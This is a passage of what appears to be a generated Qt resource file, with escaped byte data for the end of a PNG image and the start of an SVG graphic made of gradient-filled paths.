ce\\x1cH\\xa2\\xec\\xdf7B\\xd2d\\xf6\\xa6\\\nI)#\\xadN\\xe6Qy\\x82$\\x8f\\xf2\\x05\\x92|a\\\n\\x80>\\xcbZ\\x83\\xf7l!5\\xbd-p\\x03\\xea3\\x90\\\n\\xf1\\xbd\\x0e`\\xa7:\\xf2\\x5c\\xab\\x18J\\x00\\xb2M\\xd7\\x99\\\n\\x91.\\x99$3/1\\x80,N\\x91!E\\x06\\x8e\\x08\\\n:\\x8d\\xe2\\x94\\xa5\\x91N\\xf3L\\xa7,\\xd5i\\x942\\x1d\\\n!\\xca\\x99\\x0e\\x18g\\x01s\\xe8A^2\\xde\\x7f\\x8er\\\nD%\\x84\\x8er\\x852\\x94%rUDy\\x94G\\x92\\\n!(\\x82\\x82\\xab\\x09\\x14\\xff\\xa5Ta!\\x0a.\\x22\\x04\\\n\\x90\\x91\\x87\\xd6\\x22\\xb7L\\x0a#\\x07D+\\x19\\xb4`B\\\n3\\xe9A\\xb7\\xd0R3a\\xde\\x85fR\\xb7B\\xb7\\x1e\\\n\\x93B\\xb7\\x1ec\\xd2c\\x1e\\x93@\\xab\\x19\\x93\\x1e\\x93\\xf0\\\n\\xe0\\xa1E\\xeb1\\xaf\\x85\\xc7\\xa4\\x80\\xf4\\xe0\\x99W)\\xd0\\\nJ!E+=!\\x85\\xbc'%\\x00-\\xe4=\\x09p\\\n \\x8fdXr\\xc1K\\x19\\xc9@q\\x91\\x9b6\\x9es\\\n\\x95s\\x95#\\xca\\x03e\\x16\\x0d^F\\xa5\\xd2e\\x84(\\\n\\xc7\\x1cATfA\\xb2\\xc0Ir\\x9cFi\\x848]\\\n$\\xd91\\x92\\xdc\\xfasa\\xf9o\\x1c\\xbaV\\x070\\xdc\\\n1\\xae\\xdf4\\xd9\\xd5\\x01\\x00k\\xc6\\xed\\xe8\\x00V;\\xe8\\\n\\xc8\\xe8\\xa5\\x02\\xe0v:\\x81S\\x04\\x12\\x00\\xd0,M\\xd2\\\n8Kt\\x96 
\\xb7\\xe5c\\x1cb\\x10\\x98T\\x12\\xdb\\xd5\\\n\\x0d\\x86P\\x06C\\x09\\x00\\x13\\x95\\x98G\\x9aA\\xab\\xc0\\xc2\\\n\\x88fk\\xd7wL\\xa1\\xcd@C\\xf1BH\\x11\\xe4\\xe8\\\n\\xa3j\\xe5\\xa6\\xf3\\x9b)\\xb5\\x0d\\x8ch\\xb4\\x02\\xe3~m\\\nu\\xef\\x88eZ\\xb4\\xf0\\xec\\xbepX\\xadU\\xe5!\\xa4\\\n\\x15\\x08\\xb0\\xebzT\\xdfJ\\x00\\x19*'\\x96TP\\x9a\\\n\\x1a\\xfc\\x5c\\xf5X\\xae2Sw\\x19l\\x9f\\x95\\xee\\x9f\\xba\\\n\\xbfW\\x06\\x0e0\\xcd\\x17I\\x9a\\xa4\\xf3E\\x02\\xa4\\xc7\\x81\\\n\\xa9\\xe4\\x92Z\\xb9\\xea`\\xbeM]\\x97-\\xee\\xa6\\x1b\\x98\\\n\\xf6\\x06\\xfd`W\\x07\\xb0\\xaa`7\\xf2\\x081\\xf3\\xd7]\\\n+\\x01\\x5c6\\xec\\xcdtf\\x83\\xcaF\\xe9\\xfd\\x87\\x0f\\x1e\\\n>x\\x90\\xc6\\x19\\xee\\xb3\\x07\\xd0O\\xbe\\xff\\xe0|\\xfa\\xf0\\\n\\xfe\\xc3\\xfb\\xd9\\x83\\xf4\\xfb\\xe9\\xf7\\xb9\\xf6G\\xc8\\xa7\\x98\\x22\\\n\\x9fN\\x81Q\\xe9\\x13V\\xf2\\xd1\\x86\\xff\\xf94\\x9fj\\xc5\\\nGy\\x94\\xcfJ\\xa2x\\xa3\\xc89!j\\x9aG\\xc8g\\\n%W\\x9c\\x11\\x15\\x8c*\\xae\\x9a\\x86\\x9f\\x93\\x86\\xabC}\\\nH\\x1a2]\\x86\\xcbP\\xdd\\xad\\xa2\\x8b\\xe8\\x82\\x09\\x22\\xa7\\\n\\x1d\\x11\\x04\\xef}%\\x99\\x1a\\xcbz,\\x1b!\\x9b\\xba\\xa9\\\n\\xebF\\xc8\\xa6\\x1e\\xd7c\\xe9i\\xd1\\xeaZ(\\xd1\\xea\\xb1\\\n\\x14m\\xc3\\x22\\x0c\\x15\\xcfg\\xe5\\xe1\\x03<(\\x7f0}\\\n\\x90?\\xfe\\xee\\x0f\\x1e=H\\x8f>J\\xe7\\x8f1\\xff\\xe8\\\n!\\x90{P\\\n\\x9d\\xdc\\xaf\\x0e\\xf5L\\xfb#\\xc2*\\xce\\xa6\\x84M\\xf5L\\\nW\\x87\\xf9\\xe1\\x88\\x8fJ\\x9f\\xe7S\\xa2\\x02\\xe2\\x8f\\xa6\\xc4\\\n\\xaf\\xf8\\xf9a>\\xab\\x82\\xea\\xb0:\\xac\\x0e\\xcb\\xc3\\x1c\\x95\\\n\\x10J\\x86\\x8ap%\\xa7\\xcfe\\xb4\\x9e6S\\x22\\xef]\\\n\\xb6c\\xea\\x8d\\xbdq]\\xdf{.x\\xa70\\xae\\xebF\\\nxJ\\xc8q]35\\xae\\xc7\\xb2\\xa9\\x9b\\x9ay\\xd2d\\\n\\xf4+A\\xeb\\xb1\\x14RxD\\x09*\\x9b)\\xe1\\xe4s\\\n1m\\xb8z.\\xa6\\xff\\x8c)i$\\xe1\\xa49\\xd4K\\\n\\xca\\xcf\\x05'\\x17S%g\\x17\\xb3\\x8bi\\xeb\\x93Yu\\\nX\\xf1i\\xc9\\x15\\xbf\\x98M1-\\x0f1\\x05Q\\xfcb\\\nVr\\xc5\\xa7\\x8f\\x8ef\\x8f\\x8e\\x9e\\xde\\xaf\\x1e\\x1d=\\xfd\\\n~\\xf9\\x93\\x07\\xf9\\xd3\\xfb3<\\xba_=:zzz\\\nz\\xb4H\\x1e\\x9d\\xc6\\x0f\\x93\\xc7\\xa7\\xc9\\xe3\\xe4\\xf4\\xd9i\\\nr\\x9a\\xa4\\xa7\\xc9\\xe9\\xa9a\\xfd\\xe9)N\\xad\\x87\\x1f\\xfd\\\nb\\xda\\x01L\\x84\\x9f\\x15\\x01\\xa7\\xc9\\xa9\\xeb\\xe4\\xff\\xe14\\\n9\\xed\\x00\\xd2\\xcbu\\xfb\\xa1C\\xd7u\\x00\\xb9\\x02\\x05_\\\n\\xdb\\x02\\xae\\xf0\\xda6\\x00\\xf7s\\xef>\\xb6?l\\xbc\\x8a\\\n\\xae\\xf2H\\xbfr\\x0bUJ\\x8c\\xae\\x93\\xa4\\xb6\\xa8Ib\\\n\\x94\\xd9\\x98\\x95A\\xc9U\\xa0Y\\xefb\\xb2\\xca\\x92\\x193\\\n\\xb4\\x0a\\x8c\\xb3\\x11n`\\x08\\xfaW\\x19\\x95F\\xf7\\x92Q\\\n\\x0e\\x08\\xae\\x00\\x09\\xf1\\xde/B\\x9b\\xc3\\x04!\\xa3\\x1c\\x06\\\nI\\xd6.\\xf9\\xc2:\\x9b6YG\\xcc\\xe3J\\xde\\xfbD\\\n\\xc8(7\\x13\\xac\\x18\\xdb-p\\x19n\\xa5\\x8d\\xd9\\xe3\\xe6\\\nJJ\\xael\\xda\\x06\\x5c\\xb9\\x16\\xae6\\xce\\xdd\\xc0T\\xeb\\\n5>\\xdc\\x08\\xe5\\x89u\\xbcg\\x1b\\xf4\\xc6D\\xf2\\xc5\\x19\\\n\\x8eOz\\x8cwK\\xaf\\x1f:}\\xaf\\xd4|\\xdaO]\\\n_\\x1a{\\x9b_\\x00H\\xd7y\\xdd\\xed\\x1b\\x00n\\x90\\x02\\\n\\xf6D\\xbbM\\xc0\\xd2\\x16`\\xe0V\\xb8\\xb8\\xf4\\x98\\x0d\\xbd\\\nZ\\xe6\\xfb|\\x11gH\\x0c\\x94gU\\x80\\xde\\xae\\xc8m\\\n\\xe0\\x81\\xd3\\x09`\\xd2c\\x18\\x06m\\x80\\xb3\\x1c\\xa1)\\xcc\\\n\\xe2\\x14p\\xc3;@\\xde\\xfbD\\xd8\\x82F\\x1e/\\xa2B\\\n\\x87\\xaa\\xc7\\x0f 
z|\\x11\\x10\\xd6$7\\x13\\xef\\x08)\\\n\\xb8\\x82y3V|\\x11\\x95\\x9c\\x95\\x81\\xcd\\x95\\x08J\\xce\\\n\\x5cUm\\xab\\xb1X+\\xc8\\xa0{(\\xb9\\xe2Yb\\x5c\\\n\\xf9\\xf3(\\x1d\\xe4\\xe8\\xc4\\x19\\x92t\\xbe\\x00\\xec\\x9dH\\xd2\\\n\\xe3\\x13\\xc4\\xd9\\x8d\\x9c\\xbd\\x06\\x07\\xbc\\xca\\x148\\x9b\\x7f`\\\n\\xfe\\xf5\\xbf\\x81t^G\\xbc\\x9bK)o\\xc8\\x98\\x93W\\\n\\xd9\\xdfu]\\x1bw\\x1d\\xe0\\x0c\\x01X.\\xf7\\x8f\\x0c\\x0e\\\n80Q\\xa7\\x16T4\\xe0A\\x96\\x1a\\xafV\\x8a\\x18\\x0c\\\n\\x19\\xb2t\\x8e\\x08\\x19P20\\x80\\x05\\xce\\xe7\\xc0\\xf2@\\\nG\\xd0\\x11J\\x8e\\xa9Y\\xc9\\x99\\x89\\xba\\xb1ev\\xb5\\xf1D0X\\\n\\x80N\\xbb\\x9as,\\x17223\\xe6\\x98\\xab2\\xf2\\x07\\\n\\x80sp\\x98\\x8fl\\xc3\\xf2+4\\xb0\\xcf6Z\\xd15\\\n7e\\xff\\x8d\\xfa&\\x05\\x80\\x9d&\\x83\\xd4\\xc6\\x0a\\xbc\\x0d\\\n\\xf7\\xb7\\x10C{\\x0c;\\xd6\\xd8\\x83g@\\x86\\xe1\\x10\\xb4\\\n\\xb5\\xf35\\x94\\xa2\\x1f\\xd5l\\x0c\\xa3IhHX\\x8aT\\\n#\\x8d\\xb3$K2\\xc4\\xd0\\x19R\\x96\\xb28\\x8d\\xcd\\xba\\\n4\\xce\\x92,\\x8d\\xed\\x1c\\x8a\\x81F\\x04V\\x22\\x02J\\x04\\\n@\\x89\\xd2|\\xcaa\\xb2\\x1bKVrV\\x22\\x8fJV\\\nr\\xa5K\\x9e\\xb3\\x92\\xb3R\\x05y\\xa0UPj\\xc5\\xa1\\\n\\x15WP\\x81\\xd2e\\x1e\\xe4Q\\xc9J\\x15\\xa8\\x80\\x05*\\\n`e\\x14D\\xc8\\x83\\x1c9+Q\\x02\\x88L6#\\x00\\\n\\xb0\\xa0\\xfflj\\x8b\\xe5\\x0czk\\xc9\\xa1\\xa1S\\xccS\\\n \\xb1J\\xd0P[\\xba\\x1d\\x99\\x9b\\xb2\\xc1\\xfe\\xdd}&\\\n\\x84\\xec\\xd3\\x01\\xcc-\\xbfA\\x070\\xfc' \\x1dF\\xae\\\n\\xce\\xd3\\xad.\\x84t\\x9b7'\\x7fvu\\x83\\xcdIv\\\n\\xda\\xd6-\\xec\\x16\\xb3\\x1d\\xd2A\\xff\\xe8c\\x127=\\xc6\\\ni\\xd0\\xdb}\\xa8\\xd7!\\xdcg7\\xe7\\xe5Ib\\x85\\x82\\\n\\xf5\\xf9\\xa5}\\x0c\\xe3F\\xb1(\\x832\\xb0\\x91\\x8b\\x81\\xd9\\\n\\xd4\\xe0uF\\xf2s\\xc5\\x19`jggf~-\\xf4\\\n\\x0a\\x0c\\x9c\\xbfnW\\xb8o_\\x1cL\\xd1^\\xf7G6\\\nN\\xd4\\x9bD\\xc1v\\xbc\\xefF\\x84\\x1b\\x19\\xdf\\xf5\\xec\\xd8\\\n]\\x06\\x87\\xd8[\\x13\\xdd\\xack\\xe0\\x0d*\\xde\\xde\\x82\\x08\\\n\\xba\\x0dZ\\x88\\xbe\\x05\\x02[\\x0d\\xcc\\x89\\x80a\\xc7\\x8f\\x01\\\n8\\xdcz\\xef\\x1f\\x1d:\\xb6\\xd24\\x01\\xb2$v\\xe6C\\\nl\\xa2\\xdb2\\xeb\\x88\\xb4\\xd1\\x08\\xe6u\\xb0\\xa4I\\x9a\\x1b\\\n\\xe58\\xb1n\\xf34-S\\xa4A\\x92\\x06\\xd0%\\x00\\x86\\\n2+\\xb3\\x1cyj<\\x0fe\\x96#\\xca\\xd3(\\xcd\\xc1\\\n\\xcb\\x93\\x1c*\\x8d\\xca,\\xc8\\xd3\\x1c%+Y\\xc9\\x10!\\\n\\x02\\x0bX\\xc0\\x02\\xa5K]\\xea K\\xb2d\\x91d\\xc7\\\n1\\x90\\xcd\\xb1\\x88q\\x1c#>\\xc6\\x22\\x8917\\xf9u\\\n1b\\xcc7z\\xbas\\xdai \\xc3\\x22A\\x8c\\xc4\\xfc\\\n\\x91\\xcc\\x1aF\\xb8Q\\x14X\\x8c\\x1f\\xd6!\\xd3\\xf5~\\xfd\\\n-)\\xdb]Y\\xc8\\xf0\\xc7\\xfd\\x06\\x9c\\xe1h\\x87\\xd1\\xa0\\\n\\xf8\\xe5\\xcb\\xc9:\\x91\\xae\\x15\\x00\\xbb\\xfe\\xe7\\x97E\\x1a\\x0d\\\nh[:\\x5c\\x95\\x15\\xbbc\\xe8U\\xb5\\xd9~7\\xb8\\xc2\\\n|\\x81A\\x9e\\xbc\\xe9\\xf3\\xdaA\\x0fn\\xa6<\\x96\\xf63\\\n\\xe6\\xb9.iBn\\xe3\\xbd\\x02\\x00y\\x94\\xda\\x14{\\x93\\\nr\\xef\\xaek\\xa8\\xe1]\\xf7\\xdfz\\xf9w{\\xado\\x9b\\\n\\xba\\xcd\\xfd\\xdc\\x16\\x00_\\xefX\\xb0\\x12\\x00\\xb7\\xed\\xfe\\x96\\\n^&\\x01\\x08,\\xca\\xd8c\\x07\\xa4\\xfb1\\xf64\\xdb-\\\nJn\\xe0\\xff\\xc6\\xe65R\\xc2\\x88M\\x18C\\xba\\xefc\\\ns$\\x99\\xdd0\\x01\\x90,0O2$\\xe9<\\xc5q\\\n\\x8a\\x12\\x1aQ\\xca\\x92,\\xc9R 
\\x86\\x89\\xaf\\xc9\\xd2d\\\n\\x81d\\x91\\xd8h\\x86$K2,\\x00\\x8d\\xc4D\\x01o\\\n\\x04\\x00\\x034JDi\\xb2HR\\xc4H2\\xe7\\x95\\xb7\\\nax\\xc7FNgW\\xfa~\\x7f\\xedn\\x14\\xdf\\xfc\\x91\\\n[\\xd0\\xb6mO6\\x98\\xfe\\xf5\\xb7\\xf2\\x95\\x88t\\xe8E\\\n\\xc0\\x96\\xa9pm\\x9bx\\x99\\x08\\xe8']\\xb4k~\\xfc\\\n7\\x04\\xae\\xa9\\x92\\xfd6\\xcb\\xf0\\xc0\\xb8\\xe9\\xdc/\\xa3\\xbe\\\n\\x1f\\x02\\x16Ms\\x03\\xe8<\\x02\\x00\\xad\\x82t\\xbe\\xd8\\xc4\\\n0m\\x86a7U\\xa6\\xfdu3\\xb8\\xf7\\x9c2Q\\x0b\\\n,E\\x92\\xce\\x17&\\x0a\\x17\\xdb\\x22`oL\\xdeu\\xb4\\\n\\xaf\\x86\\xe9^\\xea+R\\x9b\\xbd\\xf0\\x0d\\x89\\x80\\x0e\\x00\\x1a\\\n\\xd7\\x00\\xfa)1\\x07\\xd7w\\xed\\x05\\xf5?o\\xda\\xc0\\x10\\\n\\x06\\xe8\\xa7Q\\xef\\x8f\\xf4\\xe3\\xbf\\xf1z\\x0f\\xe4\\xf5\\xbc\\xb5\\\n\\xff\\xado#;Qj;7\\xec\\x9a\\xe3\\x0cb#`\\\n\\xf5.$i\\xa23$\\x16\\xbc\\xc9\\x86\\xdbm0x\\x03\\\n\\xc2\\x0fDtl\\x95\\xbdd\\xd7\\xb2\\xbb!\\xe4\\xda\\xd1M\\\n\\xe6\\xdd\\xb6\\xae\\xb6\\x1d\\xb2u\\x83\\xaf\\xc5\\xdd\\x07\\xb7M\\xd7\\\n\\xdf\\x95\\x1b\\xae\\xe3&\\x1a6\\x00\\xdam7\\xb3~\\xac\\xd9\\\nwA\\xb7\\x15\\x00\\xc3sy\\xdd`\\xaf[\\xd0\\xf6\\xd5`\\\nx\\xd7\\xb6\\xae\\xdf\\x9cp\\xff\\xfdNR\\x97\\xd3d\\xa7\\xcb\\\np.\\xc8u\\xa0+\\x98\\xff\\xef\\xee\\\n\\xea\\xbe\\xae\\x0e0\\xdc\\xaf\\xdb{\\x94}\\xd4\\x0d\\xc7\\x8fW\\\n\\xa0\\x97\\xea\\x00\\xc0~\\xdcc8\\x04\\xfc\\x8eD\\xc1\\xfes\\\n\\x98\\x06`\\x0b\\xe0\\x98\\xb2\\xcb\\x04\\x9d\\xfd\\x1f\\xce\\xe0\\xecn\\\n\\xc6n\\xbe\\x06\\x0d`\\xe2\\xfddM\\x00\\xf7nu\\x92m\\\n\\xb8{g\\x0f\\xb2\\x8d0l\\xfb\\xb5v\\xf8\\xeb\\xbent\\\n\\x5c\\x82\\x97\\x89\\x98\\xfd\\xe6\\xdc\\xce\\x06\\xdd\\xd6\\xb7}W\\xf2\\\n{\\xa3-\\x1d\\xc4\\x91\\x9d\\xdet\\xabJ\\x9c\\xeb\\xf7\\xdb\\x02\\\n`\\xfb?\\xec\\xfe\\xefW\\xa5\\xdb\\xb4\\xa6a\\xc7\\xe8p\\xb5\\\n\\xa3\\xbcL\\x00\\xec\\x82';\\xd7\\xdc\\x0d|#\\x9d\\x01=\\\nn^\\xf6\\xfd\\xe7[\\x09\\x80\\xab\\x8du[\\x07\\xdc\\xf3\\xfb\\\no\\x83\\xf6\\xb5MG\\xae\\x014\\xa3\\xc1\\xcf\\xdd\\xc0=x\\\ne\\x97\\xdfq\\x9b\\xbe\\x85\\x94\\xecv\\x9a\\xd5\\xb6\\x890T\\\n\\xcf\\xed\\xd6\\x837\\xfb\\xf9\\xe6\\xe5\\xa5\\x08\\xdd\\xde\\x15\\xdf\\xb0\\\n\\xe8\\xfcMh\\xcf\\x1fh\\xdcO\\xfdE\\x8e6\\x9bv\\xd7\\\n\\x88\\x80nk\\x87k\\x8f\\xfd\\xfb\\xa0W\\x19M\\xb7|\\xe8\\\n\\xfb\\x0e\\xb4\\xc7\\xd2\\xbc\\xe6\\x94\\xbb\\x03\\xfa\\xefW\\xc3\\x07v\\\n\\xac!\\xb7nh|\\x99\\xf7fw\\x05`r\\xc46\\xc1\\\ndv\\xd7\\x9d\\x81lW\\xa7\\xfaF\\xcd\\xc4\\xafM\\xbf\\xc1\\\n=\\xbf\\xc2\\xea\\xfdjfO\\xb7\\xe0\\xf0\\xef\\xb5%\\xeco\\\n\\x00\\xbb\\xbf\\xeek\\x00\\x18a\\x1f\\x0e\\xe0\\xd6uW\\xb6\\xc7\\\nf\\xfb\\xff\\x1f\\xd1\\xed%\\xc0\\xb5;~\\x03\\x07\\xfb\\xfa\\xb4\\\n\\xaf\\x01\\xe0z\\x010T\\x02\\x9b\\xd1\\x8d:\\xc0^\\xed\\xe7\\\n\\x7f\\x16\\x1a*\\xf6\\xd7\\xd0@e\\x18h\\x8f\\xfb\\x96\\xdf9\\\n]\\xd1b6\\xfc\\xdf\\xb5\\x02\\xcc\\x96\\xc4}s\\x22\\x00\\x9b\\\n\\xb6\\xb3+\\x02v\\xf6\\xdfrm\\xeem\\x8d\\xff\\xa3\\xd1N\\\n\\x9f\\xbc\\xc6\\x10x\\x95#\\xfe\\x9e\\xd8|\\x03]\\xd5\\x01z\\\n\\x1a6\\x80\\x86\\xf68\\x00\\xe0XH\\x1c\\x16\\xe0Z\\xc56\\\n\\xcb\\xb7\\x86\\x00\\x87\\x19\\x0c\\xde\\xcd>\\xff\\xea\\xe9\\x16\\x12\\xe0\\\n\\x7fh\\xeae\\xfb\\xc6\\x09\\xe0~\\xd9\\xfaC#\\xb2\\xa3/\\\n\\xbcT\\x00\\xec\\xc6\\xff\\xef\\xdb\\xeew\\x8f&\\xfe\\x06\\xf4{\\\n\\x18\\xb6\\xbfQ\\xba\\x85\\x0e0\\xe4\\xff\\xf6\\x10\\x80f\\xf3\\xd5\\\nu\\xf5\\x1e4\\xb9\\x8d\\x0e@\\xae\\xd9\\xee_\\x0b\\xf7q]\\\n\\x0f\\xff\\xd7-\\x01\\xb6\\xc5\\xf6\\x16\\xff\\xaf\\x8c\\x09#g\\xf8\\\n;\\xe3\\xb6?\\xc8\\xd090\\xd8\\x7f\\xebD\\xc38\\x82]\\\n\\x11\\xb0\\xbbq\\x7fq\\xfb\\x7f\\xbb\\xeeF\\x93k~\\xff]\\\n\\xb7\\xb1\\xdfD\\xbf\\xd9\\xd5\\x95\\xbe\\x89\\xe3\\x0f:\\xf9\\x9e]\\\n\\x06\\xbfn\\xf
3\\x7fG\\x02\\x18S`\\xc0\\xae]\\x9d\\xe0f\\\n\\x1d\\x00\\x9b\\xa0\\xb5\\xad\\xf9}\\x87Z\\xe5.]\\xa7'\\x5c\\\n\\xf3\\xc7\\xff5v\\xc0+\\xb4\\xab+}C\\xc7\\x04``\\\n\\xd1\\xab\\xf7n\\xa3\\x03\\xec\\xf0\\xffJ\\x03@3\\x1a\\x0e\\xfa\\\nW\\xd4\\xc7+:\\xc0\\xce\\xb7\\x1b\\x04\\xc0~\\x96\\xee\\xd7-\\\n\\xae\\xa3\\x7fEc\\xc9\\x0d\\xd4\\xbd\\xe4\\x9e|\\xcdc\\x9a#\\\n\\xee\\xd5X\\xfa_\\xafT\\x03\\xb8\\xd2\\x00\\xd0\\xd0\\x9dA\\xdf\\\n\\x1d\\xe2:\\xe7\\xc0\\xce6\\xaf\\xaa\\x03\\xfc\\xcf\\x88/\\x0cu\\\n\\xa5o\\xf2\\x98/\\xfd\\xf5j5\\x88\\xab\\x0d\\x00\\xf5hW\\\n\\x04\\x90\\xfe\\xd3N\\xd7\\xde=\\xedKD\\xc0\\xee\\xb8v\\x83\\\nyq\\xed\\x1fy\\x15\\x99\\xb9;\\xc6\\xfe6p\\x89\\x97\\x1d\\\ns\\xdf\\xf5\\x0eB\\xe6^\\xd9B\\x1a\\x1eo\\xdf}\\xdc\\xd5\\\n\\x01\\xb6n\\xfd\\xae\\xfc\\xc7\\xde\\x06\\x80\\x06\\xd4\\xf5\\xf8a<\\\n\\xc0\\x15\\x1d`\\xcf\\x7f\\xbbI\\x07\\xd8\\x8aiwG\\xbc\\x06\\\n_\\xb8\\x8e\\xf6\\xd5\\xba\\xb9\\x9ev\\xc7\\xd8\\xdf\\x06.\\xf1\\xb2\\\nc\\xee\\xd5\\xc8\\xc8\\xd6=y\\xa5\\xeb\\x19\\xba%\\x06\\xeb\\x86\\\n7w\\x17\\x9bq\\xbf\\xee-\\x06\\xb3\\xaf\\x01\\x00\\xf5hK\\\n\\x00\\x0cZ\\xd8\\xa0\\x07\\xeeQ5n%\\x00\\xb6Z\\xd0\\xb5\\\n\\x02`?\\xa3_\\x15\\x92\\xdb\\x1d\\xc6\\xb6\\x0f\\xf2MH\\x82\\\n\\x97\\x8d\\xe5\\xfb{\\xc9\\xf5\\xf1\\x16\\xb7;\\xdf\\xf69;l\\\n\\x09\\x80\\xee\\xca\\xf6W\\xcd\\xff\\x9e\\xf67\\x004\\xa0\\x03\\x1c\\\n`K'\\xf8\\x0dt\\x80+\\xbb^\\x87\\x1b\\xecn\\xb3\\xe7\\\n\\xeb\\xadZ\\xc2\\xee1\\x7f\\x0b\\xfa\\xc6K\\x0f\\xb5o\\x83\\xc1\\\n\\xff~\\xe5Ky\\xc9\\xf1\\xae\\xd9\\xfe\\xaa\\xf6\\xe7~\\xbe\\xf6\\\nF\\x8evz\\xff~3\\xe0\\xda#\\xde$\\x02:\\xe0\\xca\\\n6\\xbf\\x89K\\xf7\\xb6t\\x9d\\xb8q6\\xf97r\\x0e\\xfb\\\n~\\xd3\\xf1vE\\xc0\\xef\\xc0\\xb6\\xdd\\xdf\\xfdq\\xad\\x04\\xc0\\\nP\\x13\\x18:\\x03n\\xb4\\xe9\\x0d\\xed\\xd1\\x15vv%\\x83\\\n\\xf5\\xd7\\x0d)/\\x01\\x82^\\xf9\\x9e\\xdd\\xa0o|\\x9d1\\\n\\xf8:\\xdc\\xe26\\xba\\xc0\\x8e\\x0e\\xd0}\\xa3\\x0dp/]\\\n\\xcb\\xfe\\x9b\\x1a\\x00P_\\x91\\x02\\x9b\\xb7kw\\xfam\\x0b\\\n\\x80\\xafk?_\\xafo|\\x9d1\\xf8\\xea>\\xaf\\xa0\\x0b\\\n\\xfc\\xae\\x05\\xc0\\x0d\\xec\\xbf\\xb9\\x01\\x00\\x0dF\\xaf\\xa2\\x03\\x00\\\n\\xd7\\xe0\\x05;\\xab\\xc8`\\xbd\\xfb\\xf7\\xb7\\xee\\x96_w\\xfc\\\n\\xbe\\x8d\\xbeq\\xdb\\xe3\\xbc\\xca\\xfa}\\xbf\\xef\\xe8\\x00\\xbfU\\\n\\x09p#\\xfbo\\xd3\\xfc\\xaeL+\\xf6\\xea\\x97z\\xdd.\\\n_K\\x04\\xecB\\x94\\xafp\\x11\\xd7\\xec\\xf4j\\xc7\\xba\\xee\\\n\\xfc\\xafp]\\xbfC\\xef\\xe2K\\xd8?\\x983\\xe8\\xfaC\\\n4;\\x07yYV\\xcf\\x0e6\\xb4\\x93i\\xfcW\\xe4\\xaf\\\n\\x86e\\xc9\\xaf\\x1c\\xf7\\xe5\\x89C_7\\xc1f\\xfb:\\xb6\\\n\\xaa\\xa1\\xbfR\\x0a\\xd4u\\xe7\\xef\\x8fu\\xe3\\xf5\\xbb\\x8d\\xfe\\\nj\\xb0\\xfcVR\\xb0\\xb0\\x87u\\xfb\\xae\\xe7\\xb6w\\xd2\\x09\\\n\\x82\\xaf)\\x00\\xb6\\x80\\xaa\\xbf\\xfck\\xf2\\x97\\x7f\\x8d\\xff\\xfc\\\n\\x17\\xe4/\\xff\\xafn\\xb8\\xd1m.\\xeb\\xb7#\\x00n\\x7f\\\n\\xbc\\xdb\\x08\\x80\\x97\\x88\\xf4]\\xe3\\xbf\\x03\\xfe\\xf3_\\xdc\\xf6\\\n\\xfc\\xb7\\xa5\\x97\\xb3~s1\\xb7\\xa7\\x91a\\xe0\\xab\\xecC\\\n\\x00\\x17[l\\x82+\\xfe\\xf2\\xafA6\\xe5@\\x86\\xba\\xd1\\\n\\x10\\xba}\\xb9\\x95\\xf1\\xca\\xb4'\\x89\\xd4\\x9e\\xeb\\xd5\\xd0\\xb8\\\n\\xeb\\xceO\\xdc\\xb1p\\xd3\\x05n\\xee\\xc7\\xf0\\xc2n\\x7f\\xf6\\\n[\\xd0my\\x0f\\x00\\xf8\\xff\\x00\\x9e\\x86\\xd0V\\x95Sy\\\n]\\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\\n\\x00\\x00~s\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 standalone=\\x22\\\nno\\x22?>\\x0d\\x0a\\x0d\\x0a <\\\ndefs\\x0d\\x0a id=\\x22d\\\nefs73\\x22>\\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\\n\\x0d\\x0a\\\n \\x0d\\x0a \\\n\\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\\n\\x0d\\x0a 
\\x0d\\x0a \\\n \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\\n \\x0d\\x0a\\\n \\x0d\\x0a\\\n \\x0d\\x0a \\x0d\\x0a \\\n \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\\n \\x0d\\x0a <\\\npath\\x0d\\x0a fil\\\nl=\\x22#6ff3f7\\x22\\x0d\\x0a \\\n opacity=\\x221\\x22\\x0d\\\n\\x0a d=\\x22m 432\\\n.34,374.43 c 1.0\\\n5,-0.05 2.1,-0.0\\\n9 3.16,-0.12 0.2\\\n1,1.22 0.42,2.45\\\n 0.64,3.68 -0.79\\\n,-0.02 -2.35,-0.\\\n06 -3.14,-0.08 -\\\n0.22,-1.16 -0.44\\\n,-2.32 -0.66,-3.\\\n48 z\\x22\\x0d\\x0a id\\\n=\\x22path16\\x22\\x0d\\x0a \\\n style=\\x22fill:ur\\\nl(#linearGradien\\\nt73)\\x22 />\\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\\n \\x0d\\x0a \\x0d\\x0a\\\n \\x0d\\x0a \\x0d\\x0a \\\n \\x0d\\x0a \\x0d\\x0a \\\n \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\\n \\x0d\\x0a \\x0d\\x0a \\\n\\x0d\\x0a \\x0d\\x0a <\\\npath\\x0d\\x0a fil\\\nl=\\x22#6ff3f7\\x22\\x0d\\x0a \\\n opacity=\\x221\\x22\\x0d\\\n\\x0a d=\\x22m 244\\\n.22,466.28 c 21.\\\n83,1.19 43.72,-1\\\n.14 65.52,0.7 -1\\\n.03,4.12 1.05,11\\\n.54 -4.19,13.34 \\\n-13.07,2.31 -26.\\\n4,0.44 -39.56,1.\\\n61 -0.02,12.56 -\\\n0.05,25.14 0.25,\\\n37.71 14.01,-0.4\\\n9 28.06,-1.01 42\\\n.05,0.25 1.34,5.\\\n09 1.4,10.36 0.1\\\n1,15.5 -19.44,-0\\\n.06 -38.89,0 -58\\\n.32,0.01 -4.7,0.\\\n25 -5.32,-5.69 -\\\n5.51,-9.04 -1.24\\\n,-20 -0.56,-40.0\\\n6 -0.35,-60.08 z\\\n\\x22\\x0d\\x0a id=\\x22pa\\\nth32\\x22\\x0d\\x0a st\\\nyle=\\x22fill:url(#l\\\ninearGradient73)\\\n\\x22 />\\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\x0d\\\n\\x0a \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\x0d\\\n\\x0a \\x0d\\x0a\\\n \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a\\\n \\x0d\\\n\\x0a \\\n\\x0d\\x0a \\x0d\\x0a <\\\npath\\x0d\\x0a 